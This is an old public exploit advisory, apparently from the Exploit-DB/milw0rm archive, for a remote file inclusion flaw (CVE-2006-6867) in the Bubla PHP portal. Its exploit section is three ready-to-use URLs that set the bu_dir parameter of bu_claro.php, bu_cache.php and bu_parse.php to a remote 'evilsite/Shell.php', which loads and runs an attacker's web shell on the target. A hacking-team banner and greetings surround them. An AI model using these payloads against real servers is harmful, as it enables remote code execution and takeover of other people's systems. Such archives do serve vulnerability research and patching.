Bubla 0.9.2 - 'bu_dir' Multiple Remote File Inclusions

Author: DeltahackingTEAM
type: webapps
platform: php
port: 
date_added: 2006-12-30  
date_updated: 2016-09-21  
verified: 1  
codes: OSVDB-32544;CVE-2006-6867;OSVDB-32543;OSVDB-32542  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.combubla-0.9.1.tar.gz  

raw file: 3059.txt  

**********************************************************************************************************
                                              DeltasecurityTEAM
                                              WwW.Deltasecurity.iR
**********************************************************************************************************

* Portal Name = Bubla 0.9.1

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-0.9.1.tar.gz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Conatact = Davood_cracker@yahoo.com

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------

- Exploit:


http://localhost/[PATH]/bu/bu_claro.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_cache.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_parse.php?bu_dir=http://evilsite/Shell.php?
--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************

# milw0rm.com [2006-12-31]